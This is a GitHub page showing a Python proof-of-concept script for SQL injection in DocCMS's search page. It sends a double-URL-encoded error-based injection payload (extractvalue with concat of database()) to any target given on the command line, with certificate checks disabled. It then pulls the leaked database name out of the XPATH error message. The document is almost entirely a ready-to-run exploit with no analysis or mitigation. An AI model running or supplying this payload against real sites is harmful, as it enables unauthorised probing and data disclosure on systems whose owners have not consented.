-
Notifications
You must be signed in to change notification settings - Fork 75
/
poc-yaml-doccms-sqli.py
32 lines (26 loc) · 1.35 KB
/
poc-yaml-doccms-sqli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#author: myh0st@xazlsec
import requests
import urllib3
import sys
import time
import json
import re
urllib3.disable_warnings()
def verify(site):
burp0_url = site + "/search/index.php?keyword=%25%33%31%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%34%25%36%31%25%37%34%25%36%31%25%36%32%25%36%31%25%37%33%25%36%35%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept-Encoding": "gzip"}
r = requests.get(burp0_url, headers=burp0_headers, verify=False)
if "XPATH" in r.text:
info = re.findall("~([^~]+)~", r.text)
if len(info) != 0:
return info[0]
return ""
if __name__=="__main__":
target = sys.argv[1]
info = verify(target)
if info != "":
print("[+]漏洞存在,查询当前数据库的名称为:", info)
else:
print("[-]漏洞不存在")